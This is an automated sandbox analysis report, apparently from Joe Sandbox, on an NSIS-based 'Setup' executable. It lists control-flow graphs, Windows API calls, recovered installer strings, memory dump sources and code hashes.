155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                                                                        APIs
                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                        • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                        • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                        • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                        • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                        • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                        • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                        • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                        • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                        Strings
                                                                                                                                        • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                        • Call: %d, xrefs: 0040165A
                                                                                                                                        • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                        • detailprint: %s, xrefs: 00401679
                                                                                                                                        • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                        • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                        • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                        • BringToFront, xrefs: 004016BD
                                                                                                                                        • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                        • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                        • Jump: %d, xrefs: 00401602
                                                                                                                                        • Aborting: "%s", xrefs: 0040161D
                                                                                                                                        • Rename: %s, xrefs: 004018F8
                                                                                                                                        • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                        • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                        • Rename failed: %s, xrefs: 0040194B
                                                                                                                                        • Sleep(%d), xrefs: 0040169D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                        • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                        • API String ID: 2872004960-3619442763
                                                                                                                                        • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                        • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                        • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                        • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                                                                        APIs
                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                        • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                        • DestroyWindow.USER32 ref: 00405512
                                                                                                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                        • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                        • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                        • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                        • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                        • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                        • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                        • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                        • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3282139019-0
                                                                                                                                        • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                        • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                        • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                        • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                          • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                          • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                        • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                        • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                        • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                        • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                        • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                        • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                          • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                        • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                        • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                        • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                        • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                        • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                        • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                        • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                        • API String ID: 608394941-2746725676
                                                                                                                                        • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                        • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                        • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                        • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                        • lstrcatW.KERNEL32(00000000,00000000,ForbesHarvardKennedyMarchOthers,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                        • CompareFileTime.KERNEL32(-00000014,?,ForbesHarvardKennedyMarchOthers,ForbesHarvardKennedyMarchOthers,00000000,00000000,ForbesHarvardKennedyMarchOthers,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427976,759223A0,00000000), ref: 00404FD6
                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FE6
                                                                                                                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FF9
                                                                                                                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                        • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$ForbesHarvardKennedyMarchOthers
                                                                                                                                        • API String ID: 4286501637-1056575836
                                                                                                                                        • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                        • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                        • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                        • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 587 40337f-403398 588 4033a1-4033a9 587->588 589 40339a 587->589 590 4033b2-4033b7 588->590 591 4033ab 588->591 589->588 592 4033c7-4033d4 call 403336 590->592 593 4033b9-4033c2 call 403368 590->593 591->590 597 4033d6 592->597 598 4033de-4033e5 592->598 593->592 599 4033d8-4033d9 597->599 600 403546-403548 598->600 601 4033eb-403432 GetTickCount 598->601 604 403567-40356b 599->604 602 40354a-40354d 600->602 603 4035ac-4035af 600->603 605 403564 601->605 606 403438-403440 601->606 607 403552-40355b call 403336 602->607 608 40354f 602->608 609 4035b1 603->609 610 40356e-403574 603->610 605->604 611 403442 606->611 612 403445-403453 call 403336 606->612 607->597 620 403561 607->620 608->607 609->605 615 403576 610->615 616 403579-403587 call 403336 610->616 611->612 612->597 621 403455-40345e 612->621 615->616 616->597 624 40358d-40359f WriteFile 616->624 620->605 623 403464-403484 call 4076a0 621->623 630 403538-40353a 623->630 631 40348a-40349d GetTickCount 623->631 626 4035a1-4035a4 624->626 627 40353f-403541 624->627 626->627 629 4035a6-4035a9 626->629 627->599 629->603 630->599 632 4034e8-4034ec 631->632 633 40349f-4034a7 631->633 634 40352d-403530 632->634 635 4034ee-4034f1 632->635 636 4034a9-4034ad 633->636 637 4034af-4034e0 MulDiv wsprintfW call 404f9e 633->637 634->606 641 403536 634->641 639 403513-40351e 635->639 640 4034f3-403507 WriteFile 635->640 636->632 636->637 642 4034e5 637->642 644 403521-403525 639->644 640->627 643 403509-40350c 640->643 641->605 642->632 643->627 645 40350e-403511 643->645 644->623 646 40352b 644->646 645->644 646->605
                                                                                                                                        APIs
                                                                                                                                        • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                        • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                        • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                        • wsprintfW.USER32 ref: 004034CE
                                                                                                                                        • WriteFile.KERNELBASE(00000000,00000000,00427976,00403792,00000000), ref: 004034FF
                                                                                                                                        • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CountFileTickWrite$wsprintf
                                                                                                                                        • String ID: (]C$... %d%%$pAB$v9B$vyB
                                                                                                                                        • API String ID: 651206458-1903973402
                                                                                                                                        • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                        • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                        • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                        • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 647 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 650 403603-403608 647->650 651 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 647->651 652 4037e2-4037e6 650->652 659 403641 651->659 660 403728-403736 call 4032d2 651->660 662 403646-40365d 659->662 666 4037f1-4037f6 660->666 667 40373c-40373f 660->667 664 403661-403663 call 403336 662->664 665 40365f 662->665 671 403668-40366a 664->671 665->664 666->652 669 403741-403759 call 403368 call 403336 667->669 670 40376b-403795 GlobalAlloc call 403368 call 40337f 667->670 669->666 698 40375f-403765 669->698 670->666 696 403797-4037a8 670->696 674 403670-403677 671->674 675 4037e9-4037f0 call 4032d2 671->675 676 4036f3-4036f7 674->676 677 403679-40368d call 405e38 674->677 675->666 683 403701-403707 676->683 684 4036f9-403700 call 4032d2 676->684 677->683 694 40368f-403696 677->694 687 403716-403720 683->687 688 403709-403713 call 4072ad 683->688 684->683 687->662 695 403726 687->695 688->687 694->683 700 403698-40369f 694->700 695->660 701 4037b0-4037b3 696->701 702 4037aa 696->702 698->666 698->670 700->683 703 4036a1-4036a8 700->703 704 4037b6-4037be 701->704 702->701 703->683 705 4036aa-4036b1 703->705 704->704 706 4037c0-4037db SetFilePointer call 405e38 704->706 705->683 707 4036b3-4036d3 705->707 710 4037e0 706->710 707->666 709 4036d9-4036dd 707->709 711 4036e5-4036ed 709->711 712 4036df-4036e3 709->712 710->652 711->683 713 4036ef-4036f1 711->713 712->695 712->711 713->683
                                                                                                                                        APIs
                                                                                                                                        • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                          • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                          • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                        Strings
                                                                                                                                        • soft, xrefs: 004036A1
                                                                                                                                        • Error launching installer, xrefs: 00403603
                                                                                                                                        • Null, xrefs: 004036AA
                                                                                                                                        • Inst, xrefs: 00403698
                                                                                                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
